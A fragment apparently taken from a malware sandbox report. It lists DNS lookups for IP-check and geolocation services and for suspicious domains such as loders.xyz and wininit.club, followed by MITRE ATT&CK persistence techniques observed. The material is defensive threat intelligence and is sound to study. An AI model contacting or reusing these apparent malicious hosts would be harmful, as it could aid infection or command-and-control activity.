DNS Response
104.26.12.31172.67.75.172104.26.13.31
-
67 B 271 B 1 1
DNS Request
checkip.amazonaws.com
DNS Response
52.206.184.8534.200.69.241107.21.162.20618.209.89.5052.20.197.752.204.109.9723.21.27.293.222.126.94
-
58 B 74 B 1 1
DNS Request
iplogger.org
DNS Response
88.99.66.31
-
60 B 110 B 1 1
DNS Request
whois.iana.org
DNS Response
192.0.32.59
-
63 B 138 B 1 1
DNS Request
WHOIS.AFRINIC.NET
DNS Response
196.192.115.21196.216.2.20196.216.2.21
-
63 B 93 B 1 1
DNS Request
www.geoplugin.net
DNS Response
178.237.33.50
-
60 B 110 B 1 1
DNS Request
whois.iana.org
DNS Response
192.0.32.59
-
63 B 138 B 1 1
DNS Request
WHOIS.AFRINIC.NET
DNS Response
196.192.115.21196.216.2.20196.216.2.21
-
56 B 72 B 1 1
DNS Request
loders.xyz
DNS Response
193.109.79.176
-
58 B 74 B 1 1
DNS Request
dashost2.xyz
DNS Response
194.147.78.109
-
58 B 74 B 1 1
DNS Request
wininit.club
DNS Response
109.248.11.138
MITRE ATT&CK Enterprise v6
Persistence
Account Manipulation
1Hidden Files and Directories
3Modify Existing Service
3Registry Run Keys / Startup Folder
2Scheduled Task
1Winlogon Helper DLL
1